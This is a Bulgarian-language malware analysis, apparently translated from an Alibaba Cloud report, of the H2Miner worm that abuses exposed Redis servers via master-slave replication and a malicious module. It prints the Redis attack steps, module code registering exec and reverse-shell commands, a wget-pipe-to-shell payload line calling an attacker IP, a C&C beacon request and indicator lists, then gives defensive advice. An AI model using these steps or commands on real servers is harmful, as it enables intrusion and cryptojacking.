Π‘Π΅ΡˆΠ΅ ΠΎΡ‚ΠΊΡ€ΠΈΡ‚ΠΎ Π½ΠΎΠ²ΠΎ ΠΎΠ³Π½ΠΈΡ‰Π΅ Π½Π° Ρ‡Π΅Ρ€Π²Π΅ΠΈ H2Miner, ΠΊΠΎΠ΅Ρ‚ΠΎ Сксплоатира Redis RCE

ΠŸΡ€Π΅Π΄ΠΈ Π΄Π΅Π½ Π΅Π΄ΠΈΠ½ ΠΎΡ‚ ΡΡŠΡ€Π²ΡŠΡ€ΠΈΡ‚Π΅ Π½Π° моя ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ бСшС Π°Ρ‚Π°ΠΊΡƒΠ²Π°Π½ ΠΎΡ‚ ΠΏΠΎΠ΄ΠΎΠ±Π΅Π½ Ρ‡Π΅Ρ€Π²Π΅ΠΉ. Π’ Ρ‚ΡŠΡ€ΡΠ΅Π½Π΅ Π½Π° ΠΎΡ‚Π³ΠΎΠ²ΠΎΡ€ Π½Π° Π²ΡŠΠΏΡ€ΠΎΡΠ° "ΠΊΠ°ΠΊΠ²ΠΎ бСшС Ρ‚ΠΎΠ²Π°?" НамСрих страхотна статия ΠΎΡ‚ Π΅ΠΊΠΈΠΏΠ° Π½Π° Alibaba Cloud Security. Въй ΠΊΠ°Ρ‚ΠΎ Π½Π΅ Π½Π°ΠΌΠ΅Ρ€ΠΈΡ… Ρ‚Π°Π·ΠΈ статия Π½Π° Π₯Π°Π±Ρ€Π΅, Ρ€Π΅ΡˆΠΈΡ… Π΄Π° я ΠΏΡ€Π΅Π²Π΅Π΄Π° спСциално Π·Π° вас <3

Π’Π»ΠΈΠ·Π°Π½Π΅

Наскоро Π΅ΠΊΠΈΠΏΡŠΡ‚ ΠΏΠΎ сигурността Π½Π° Alibaba Cloud ΠΎΡ‚ΠΊΡ€ΠΈ Π²Π½Π΅Π·Π°ΠΏΠ½ΠΎ ΠΈΠ·Π±ΡƒΡ…Π²Π°Π½Π΅ Π½Π° H2Miner. Π’ΠΎΠ·ΠΈ Ρ‚ΠΈΠΏ Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ Ρ‡Π΅Ρ€Π²Π΅ΠΉ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° липсата Π½Π° оторизация ΠΈΠ»ΠΈ слаби ΠΏΠ°Ρ€ΠΎΠ»ΠΈ Π·Π° Redis ΠΊΠ°Ρ‚ΠΎ шлюзовС към Π²Π°ΡˆΠΈΡ‚Π΅ систСми, слСд ΠΊΠΎΠ΅Ρ‚ΠΎ синхронизира собствСния си Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ ΠΌΠΎΠ΄ΡƒΠ» с подчинСния Ρ‡Ρ€Π΅Π· синхронизация Π³Π»Π°Π²Π΅Π½-ΠΏΠΎΠ΄Ρ‡ΠΈΠ½Π΅Π½ ΠΈ накрая изтСгля Ρ‚ΠΎΠ·ΠΈ Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ ΠΌΠΎΠ΄ΡƒΠ» Π½Π° Π°Ρ‚Π°ΠΊΡƒΠ²Π°Π½Π°Ρ‚Π° машина ΠΈ изпълнява Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ инструкции.

Π’ ΠΌΠΈΠ½Π°Π»ΠΎΡ‚ΠΎ Π°Ρ‚Π°ΠΊΠΈΡ‚Π΅ срСщу Π²Π°ΡˆΠΈΡ‚Π΅ систСми са Π±ΠΈΠ»ΠΈ ΠΈΠ·Π²ΡŠΡ€ΡˆΠ²Π°Π½ΠΈ ΠΏΡ€Π΅Π΄ΠΈΠΌΠ½ΠΎ Ρ‡Ρ€Π΅Π· ΠΌΠ΅Ρ‚ΠΎΠ΄, Π²ΠΊΠ»ΡŽΡ‡Π²Π°Ρ‰ ΠΏΠ»Π°Π½ΠΈΡ€Π°Π½ΠΈ Π·Π°Π΄Π°Ρ‡ΠΈ ΠΈΠ»ΠΈ SSH ΠΊΠ»ΡŽΡ‡ΠΎΠ²Π΅, ΠΊΠΎΠΈΡ‚ΠΎ са Π±ΠΈΠ»ΠΈ записани Π½Π° Π²Π°ΡˆΠ°Ρ‚Π° машина, слСд ΠΊΠ°Ρ‚ΠΎ атакуващият Π΅ влязъл Π² Redis. Π—Π° щастиС Ρ‚ΠΎΠ·ΠΈ ΠΌΠ΅Ρ‚ΠΎΠ΄ Π½Π΅ ΠΌΠΎΠΆΠ΅ Π΄Π° сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° чСсто ΠΏΠΎΡ€Π°Π΄ΠΈ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠΈ с ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π° Π½Π° Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΈΡΡ‚Π° ΠΈΠ»ΠΈ ΠΏΠΎΡ€Π°Π΄ΠΈ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ вСрсии Π½Π° систСмата. Π’ΡŠΠΏΡ€Π΅ΠΊΠΈ Ρ‚ΠΎΠ²Π°, Ρ‚ΠΎΠ·ΠΈ ΠΌΠ΅Ρ‚ΠΎΠ΄ Π·Π° Π·Π°Ρ€Π΅ΠΆΠ΄Π°Π½Π΅ Π½Π° Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ ΠΌΠΎΠ΄ΡƒΠ» ΠΌΠΎΠΆΠ΅ Π΄ΠΈΡ€Π΅ΠΊΡ‚Π½ΠΎ Π΄Π° изпълни ΠΊΠΎΠΌΠ°Π½Π΄ΠΈΡ‚Π΅ Π½Π° атакуващия ΠΈΠ»ΠΈ Π΄Π° ΠΏΠΎΠ»ΡƒΡ‡ΠΈ Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ ΠΎΠ±Π²ΠΈΠ²ΠΊΠ°Ρ‚Π°, ΠΊΠΎΠ΅Ρ‚ΠΎ Π΅ опасно Π·Π° Π²Π°ΡˆΠ°Ρ‚Π° систСма.

ΠŸΠΎΡ€Π°Π΄ΠΈ голСмия Π±Ρ€ΠΎΠΉ Redis ΡΡŠΡ€Π²ΡŠΡ€ΠΈ, хоствани Π² Π˜Π½Ρ‚Π΅Ρ€Π½Π΅Ρ‚ (Π±Π»ΠΈΠ·ΠΎ 1 ΠΌΠΈΠ»ΠΈΠΎΠ½), Π΅ΠΊΠΈΠΏΡŠΡ‚ ΠΏΠΎ сигурността Π½Π° Alibaba Cloud, ΠΊΠ°Ρ‚ΠΎ приятСлско напомнянС, ΠΏΡ€Π΅ΠΏΠΎΡ€ΡŠΡ‡Π²Π° Π½Π° ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈΡ‚Π΅ Π΄Π° Π½Π΅ сподСлят Redis ΠΎΠ½Π»Π°ΠΉΠ½ ΠΈ Ρ€Π΅Π΄ΠΎΠ²Π½ΠΎ Π΄Π° провСряват силата Π½Π° своитС ΠΏΠ°Ρ€ΠΎΠ»ΠΈ ΠΈ Π΄Π°Π»ΠΈ са ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€Π°Π½ΠΈ. Π±ΡŠΡ€Π· ΠΈΠ·Π±ΠΎΡ€.

H2Miner

H2Miner Π΅ Π±ΠΎΡ‚Π½Π΅Ρ‚ Π·Π° ΠΊΠΎΠΏΠ°Π΅Π½Π΅ Π·Π° Linux-Π±Π°Π·ΠΈΡ€Π°Π½ΠΈ систСми, ΠΊΠΎΠΉΡ‚ΠΎ ΠΌΠΎΠΆΠ΅ Π΄Π° Π½Π°Ρ…Π»ΡƒΠ΅ във Π²Π°ΡˆΠ°Ρ‚Π° систСма ΠΏΠΎ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ Π½Π°Ρ‡ΠΈΠ½ΠΈ, Π²ΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»Π½ΠΎ липса Π½Π° Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΈΠ΅ Π² уязвимоститС Π½Π° Hadoop yarn, Docker ΠΈ Redis дистанционно изпълнСниС Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ (RCE). Π‘ΠΎΡ‚Π½Π΅Ρ‚ Ρ€Π°Π±ΠΎΡ‚ΠΈ, ΠΊΠ°Ρ‚ΠΎ изтСгля Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ΠΈ скриптовС ΠΈ Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ софтуСр, Π·Π° Π΄Π° ΠΊΠΎΠΏΠ°Π΅ Π²Π°ΡˆΠΈΡ‚Π΅ Π΄Π°Π½Π½ΠΈ, Π΄Π° Ρ€Π°Π·ΡˆΠΈΡ€ΡΠ²Π° Π°Ρ‚Π°ΠΊΠ°Ρ‚Π° Ρ…ΠΎΡ€ΠΈΠ·ΠΎΠ½Ρ‚Π°Π»Π½ΠΎ ΠΈ Π΄Π° ΠΏΠΎΠ΄Π΄ΡŠΡ€ΠΆΠ° ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΈ ΠΈ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π½ΠΈ (C&C) ΠΊΠΎΠΌΡƒΠ½ΠΈΠΊΠ°Ρ†ΠΈΠΈ.

Redis RCE

Знанията ΠΏΠΎ Ρ‚Π°Π·ΠΈ Ρ‚Π΅ΠΌΠ° бяха сподСлСни ΠΎΡ‚ ПавСл Π’ΠΎΠΏΠΎΡ€ΠΊΠΎΠ² Π½Π° ZeroNights 2018. Π‘Π»Π΅Π΄ вСрсия 4.0 Redis ΠΏΠΎΠ΄Π΄ΡŠΡ€ΠΆΠ° функция Π·Π° Π·Π°Ρ€Π΅ΠΆΠ΄Π°Π½Π΅ Π½Π° плъгини, която Π΄Π°Π²Π° Π½Π° ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈΡ‚Π΅ Π²ΡŠΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚Ρ‚Π° Π΄Π° Π·Π°Ρ€Π΅ΠΆΠ΄Π°Ρ‚ Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅, ΠΊΠΎΠΌΠΏΠΈΠ»ΠΈΡ€Π°Π½ΠΈ с C Π² Redis, Π·Π° Π΄Π° ΠΈΠ·ΠΏΡŠΠ»Π½ΡΠ²Π°Ρ‚ спСцифични ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ Π½Π° Redis. Π’Π°Π·ΠΈ функция, ΠΌΠ°ΠΊΠ°Ρ€ ΠΈ ΠΏΠΎΠ»Π΅Π·Π½Π°, ΡΡŠΠ΄ΡŠΡ€ΠΆΠ° уязвимост, ΠΏΡ€ΠΈ която Π² Ρ€Π΅ΠΆΠΈΠΌ master-slave, Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅Ρ‚Π΅ ΠΌΠΎΠ³Π°Ρ‚ Π΄Π° сС синхронизират с slave Ρ‡Ρ€Π΅Π· Ρ€Π΅ΠΆΠΈΠΌ full resync. Π’ΠΎΠ²Π° ΠΌΠΎΠΆΠ΅ Π΄Π° сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° ΠΎΡ‚ Π½Π°ΠΏΠ°Π΄Π°Ρ‚Π΅Π» Π·Π° ΠΏΡ€Π΅Ρ…Π²ΡŠΡ€Π»ΡΠ½Π΅ Π½Π° Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ΠΈ Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅. Π‘Π»Π΅Π΄ ΠΊΠ°Ρ‚ΠΎ ΠΏΡ€Π΅Ρ…Π²ΡŠΡ€Π»ΡΠ½Π΅Ρ‚ΠΎ ΠΏΡ€ΠΈΠΊΠ»ΡŽΡ‡ΠΈ, Π½Π°ΠΏΠ°Π΄Π°Ρ‚Π΅Π»ΠΈΡ‚Π΅ Π·Π°Ρ€Π΅ΠΆΠ΄Π°Ρ‚ ΠΌΠΎΠ΄ΡƒΠ»Π° Π² атакувания СкзСмпляр Π½Π° Redis ΠΈ ΠΈΠ·ΠΏΡŠΠ»Π½ΡΠ²Π°Ρ‚ всяка ΠΊΠΎΠΌΠ°Π½Π΄Π°.

Анализ Π½Π° Π·Π»ΠΎΠ²Ρ€Π΅Π΄Π΅Π½ софтуСр Ρ‡Π΅Ρ€Π²Π΅ΠΉ

Наскоро Π΅ΠΊΠΈΠΏΡŠΡ‚ Π·Π° сигурност Π½Π° Alibaba Cloud ΠΎΡ‚ΠΊΡ€ΠΈ, Ρ‡Π΅ Ρ€Π°Π·ΠΌΠ΅Ρ€ΡŠΡ‚ Π½Π° Π³Ρ€ΡƒΠΏΠ°Ρ‚Π° Π·Π° Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ΠΈ ΠΊΠΎΠΏΠ°Ρ‡ΠΈ H2Miner Π²Π½Π΅Π·Π°ΠΏΠ½ΠΎ сС Π΅ ΡƒΠ²Π΅Π»ΠΈΡ‡ΠΈΠ» драстично. Π‘ΠΏΠΎΡ€Π΅Π΄ Π°Π½Π°Π»ΠΈΠ·Π° общият процСс Π½Π° възникванС Π½Π° Π°Ρ‚Π°ΠΊΠ° Π΅ слСдният:

Π‘Π΅ΡˆΠ΅ ΠΎΡ‚ΠΊΡ€ΠΈΡ‚ΠΎ Π½ΠΎΠ²ΠΎ ΠΎΠ³Π½ΠΈΡ‰Π΅ Π½Π° Ρ‡Π΅Ρ€Π²Π΅ΠΈ H2Miner, ΠΊΠΎΠ΅Ρ‚ΠΎ Сксплоатира Redis RCE

H2Miner ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° RCE Redis Π·Π° ΠΏΡŠΠ»Π½ΠΎΡ†Π΅Π½Π½Π° Π°Ρ‚Π°ΠΊΠ°. НападатСлитС ΠΏΡŠΡ€Π²ΠΎ Π°Ρ‚Π°ΠΊΡƒΠ²Π°Ρ‚ Π½Π΅Π·Π°Ρ‰ΠΈΡ‚Π΅Π½ΠΈ Redis ΡΡŠΡ€Π²ΡŠΡ€ΠΈ ΠΈΠ»ΠΈ ΡΡŠΡ€Π²ΡŠΡ€ΠΈ със слаби ΠΏΠ°Ρ€ΠΎΠ»ΠΈ.

Π‘Π»Π΅Π΄ Ρ‚ΠΎΠ²Π° ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚ ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° config set dbfilename red2.so Π·Π° Π΄Π° ΠΏΡ€ΠΎΠΌΠ΅Π½ΠΈΡ‚Π΅ ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° Ρ„Π°ΠΉΠ»Π°. Π‘Π»Π΅Π΄ Ρ‚ΠΎΠ²Π° Π½Π°ΠΏΠ°Π΄Π°Ρ‚Π΅Π»ΠΈΡ‚Π΅ ΠΈΠ·ΠΏΡŠΠ»Π½ΡΠ²Π°Ρ‚ ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° slaveof Π·Π° Π΄Π° Π·Π°Π΄Π°Π΄Π΅Ρ‚Π΅ адрСса Π½Π° хоста Π·Π° рСпликация Π³Π»Π°Π²Π΅Π½-ΠΏΠΎΠ΄Ρ‡ΠΈΠ½Π΅Π½.

ΠšΠΎΠ³Π°Ρ‚ΠΎ атакуваният СкзСмпляр Π½Π° Redis установи Π²Ρ€ΡŠΠ·ΠΊΠ° Π³Π»Π°Π²Π΅Π½-ΠΏΠΎΠ΄Ρ‡ΠΈΠ½Π΅Π½ със злонамСрСния Redis, ΠΊΠΎΠΉΡ‚ΠΎ Π΅ собствСност Π½Π° атакуващия, атакуващият ΠΈΠ·ΠΏΡ€Π°Ρ‰Π° заразСния ΠΌΠΎΠ΄ΡƒΠ» с ΠΏΠΎΠΌΠΎΡ‰Ρ‚Π° Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° fullresync Π·Π° синхронизиранС Π½Π° Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅Ρ‚Π΅. Π‘Π»Π΅Π΄ Ρ‚ΠΎΠ²Π° Ρ„Π°ΠΉΠ»ΡŠΡ‚ red2.so Ρ‰Π΅ бъдС ΠΈΠ·Ρ‚Π΅Π³Π»Π΅Π½ Π½Π° Π°Ρ‚Π°ΠΊΡƒΠ²Π°Π½Π°Ρ‚Π° машина. Π‘Π»Π΅Π΄ Ρ‚ΠΎΠ²Π° Π½Π°ΠΏΠ°Π΄Π°Ρ‚Π΅Π»ΠΈΡ‚Π΅ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚ ΠΌΠΎΠ΄ΡƒΠ»Π° Π·Π° Π·Π°Ρ€Π΅ΠΆΠ΄Π°Π½Π΅ ./red2.so, Π·Π° Π΄Π° зарСдят Ρ‚ΠΎΠ·ΠΈ Ρ„Π°ΠΉΠ» so. ΠœΠΎΠ΄ΡƒΠ»ΡŠΡ‚ ΠΌΠΎΠΆΠ΅ Π΄Π° изпълнява ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΎΡ‚ Π½Π°ΠΏΠ°Π΄Π°Ρ‚Π΅Π» ΠΈΠ»ΠΈ Π΄Π° ΠΈΠ½ΠΈΡ†ΠΈΠΈΡ€Π° ΠΎΠ±Ρ€Π°Ρ‚Π½Π° Π²Ρ€ΡŠΠ·ΠΊΠ° (backdoor), Π·Π° Π΄Π° ΠΏΠΎΠ»ΡƒΡ‡ΠΈ Π΄ΠΎΡΡ‚ΡŠΠΏ Π΄ΠΎ Π°Ρ‚Π°ΠΊΡƒΠ²Π°Π½Π°Ρ‚Π° машина.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Π‘Π»Π΅Π΄ изпълнСниС Π½Π° Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π° ΠΊΠ°Ρ‚ΠΎ Π½Π°ΠΏΡ€ / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, нападатСлят Ρ‰Π΅ Π½ΡƒΠ»ΠΈΡ€Π° ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° архивния Ρ„Π°ΠΉΠ» ΠΈ Ρ‰Π΅ Ρ€Π°Π·Ρ‚ΠΎΠ²Π°Ρ€ΠΈ систСмния ΠΌΠΎΠ΄ΡƒΠ», Π·Π° Π΄Π° почисти слСдитС. Π€Π°ΠΉΠ»ΡŠΡ‚ red2.so ΠΎΠ±Π°Ρ‡Π΅ Ρ‰Π΅ останС Π½Π° Π°Ρ‚Π°ΠΊΡƒΠ²Π°Π½Π°Ρ‚Π° машина. ΠŸΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈΡ‚Π΅ сС ΡΡŠΠ²Π΅Ρ‚Π²Π°Ρ‚ Π΄Π° ΠΎΠ±ΡŠΡ€Π½Π°Ρ‚ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ Π½Π° Π½Π°Π»ΠΈΡ‡ΠΈΠ΅Ρ‚ΠΎ Π½Π° Ρ‚Π°ΠΊΡŠΠ² ΠΏΠΎΠ΄ΠΎΠ·Ρ€ΠΈΡ‚Π΅Π»Π΅Π½ Ρ„Π°ΠΉΠ» Π² ΠΏΠ°ΠΏΠΊΠ°Ρ‚Π° Π½Π° тяхното ΠΊΠΎΠΏΠΈΠ΅ Π½Π° Redis.

Π’ допълнСниС към ΡƒΠ±ΠΈΠ²Π°Π½Π΅Ρ‚ΠΎ Π½Π° някои Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ΠΈ процСси, Π·Π° Π΄Π° ΠΎΡ‚ΠΊΡ€Π°Π΄Π½Π΅ рСсурси, нападатСлят слСдва Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ скрипт, ΠΊΠ°Ρ‚ΠΎ изтСгля ΠΈ изпълнява Π·Π»ΠΎΠ½Π°ΠΌΠ΅Ρ€Π΅Π½ΠΈ Π΄Π²ΠΎΠΈΡ‡Π½ΠΈ Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅ към 142.44.191.122/сродство. Π’ΠΎΠ²Π° ΠΎΠ·Π½Π°Ρ‡Π°Π²Π°, Ρ‡Π΅ ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° процСса ΠΈΠ»ΠΈ ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° дирСкторията, ΡΡŠΠ΄ΡŠΡ€ΠΆΠ°Ρ‰ΠΎ kinsing Π½Π° хоста, ΠΌΠΎΠΆΠ΅ Π΄Π° ΠΎΠ·Π½Π°Ρ‡Π°Π²Π°, Ρ‡Π΅ Ρ‚Π°Π·ΠΈ машина Π΅ Π±ΠΈΠ»Π° Π·Π°Ρ€Π°Π·Π΅Π½Π° ΠΎΡ‚ Ρ‚ΠΎΠ·ΠΈ вирус.

Π‘ΠΏΠΎΡ€Π΅Π΄ Ρ€Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚ΠΈΡ‚Π΅ ΠΎΡ‚ ΠΎΠ±Ρ€Π°Ρ‚Π½ΠΎΡ‚ΠΎ инТСнСрство зловрСдният софтуСр изпълнява основно слСднитС Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ:

  • ΠšΠ°Ρ‡Π²Π°Π½Π΅ Π½Π° Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅ ΠΈ тяхното изпълнСниС
  • МинСн
  • ΠŸΠΎΠ΄Π΄ΡŠΡ€ΠΆΠ°Π½Π΅ Π½Π° C&C комуникация ΠΈ изпълнСниС Π½Π° Π°Ρ‚Π°ΠΊΡƒΠ²Π°Ρ‰ΠΈ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ

Π‘Π΅ΡˆΠ΅ ΠΎΡ‚ΠΊΡ€ΠΈΡ‚ΠΎ Π½ΠΎΠ²ΠΎ ΠΎΠ³Π½ΠΈΡ‰Π΅ Π½Π° Ρ‡Π΅Ρ€Π²Π΅ΠΈ H2Miner, ΠΊΠΎΠ΅Ρ‚ΠΎ Сксплоатира Redis RCE

Π˜Π·ΠΏΠΎΠ»Π·Π²Π°ΠΉΡ‚Π΅ masscan Π·Π° външно сканиранС, Π·Π° Π΄Π° Ρ€Π°Π·ΡˆΠΈΡ€ΠΈΡ‚Π΅ влияниСто си. Π’ допълнСниС, IP Π°Π΄Ρ€Π΅ΡΡŠΡ‚ Π½Π° C&C ΡΡŠΡ€Π²ΡŠΡ€Π° Π΅ Ρ‚Π²ΡŠΡ€Π΄ΠΎ ΠΊΠΎΠ΄ΠΈΡ€Π°Π½ Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠ°Ρ‚Π° ΠΈ атакуваният хост Ρ‰Π΅ ΠΊΠΎΠΌΡƒΠ½ΠΈΠΊΠΈΡ€Π° с C&C комуникационния ΡΡŠΡ€Π²ΡŠΡ€, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°ΠΉΠΊΠΈ HTTP заявки, ΠΊΡŠΠ΄Π΅Ρ‚ΠΎ информацията Π·Π° Π·ΠΎΠΌΠ±ΠΈ (ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€Π°Π½ ΡΡŠΡ€Π²ΡŠΡ€) сС ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€Π° Π² HTTP Π·Π°Π³Π»Π°Π²ΠΊΠ°Ρ‚Π°.

Π‘Π΅ΡˆΠ΅ ΠΎΡ‚ΠΊΡ€ΠΈΡ‚ΠΎ Π½ΠΎΠ²ΠΎ ΠΎΠ³Π½ΠΈΡ‰Π΅ Π½Π° Ρ‡Π΅Ρ€Π²Π΅ΠΈ H2Miner, ΠΊΠΎΠ΅Ρ‚ΠΎ Сксплоатира Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Π”Ρ€ΡƒΠ³ΠΈ ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΈ Π·Π° Π°Ρ‚Π°ΠΊΠ°

Π‘Π΅ΡˆΠ΅ ΠΎΡ‚ΠΊΡ€ΠΈΡ‚ΠΎ Π½ΠΎΠ²ΠΎ ΠΎΠ³Π½ΠΈΡ‰Π΅ Π½Π° Ρ‡Π΅Ρ€Π²Π΅ΠΈ H2Miner, ΠΊΠΎΠ΅Ρ‚ΠΎ Сксплоатира Redis RCE

АдрСси ΠΈ Π²Ρ€ΡŠΠ·ΠΊΠΈ, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Π½ΠΈ ΠΎΡ‚ чСрвСя

/сродство

β€’ 142.44.191.122/t.sh
β€’ 185.92.74.42/h.sh
β€’ 142.44.191.122/spr.sh
β€’ 142.44.191.122/spre.sh
β€’ 195.3.146.118/unk.sh

s&c

β€’ 45.10.88.102
β€’ 91.215.169.111
β€’ 139.99.50.255
β€’ 46.243.253.167
β€’ 195.123.220.193

ΡΡŠΠ²Π΅Ρ‚

ΠŸΡŠΡ€Π²ΠΎ, Redis Π½Π΅ трябва Π΄Π° бъдС Π΄ΠΎΡΡ‚ΡŠΠΏΠ΅Π½ ΠΎΡ‚ ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚ ΠΈ трябва Π΄Π° бъдС Π·Π°Ρ‰ΠΈΡ‚Π΅Π½ със силна ΠΏΠ°Ρ€ΠΎΠ»Π°. Π‘ΡŠΡ‰ΠΎ Ρ‚Π°ΠΊΠ° Π΅ Π²Π°ΠΆΠ½ΠΎ ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΈΡ‚Π΅ Π΄Π° провСрят Π΄Π°Π»ΠΈ няма Ρ„Π°ΠΉΠ» red2.so Π² дирСкторията Π½Π° Redis ΠΈ Ρ‡Π΅ няма β€žkinsingβ€œ Π² ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° Ρ„Π°ΠΉΠ»Π°/процСса Π½Π° хоста.

Π˜Π·Ρ‚ΠΎΡ‡Π½ΠΈΠΊ: www.habr.com

ДобавянС Π½Π° Π½ΠΎΠ² ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€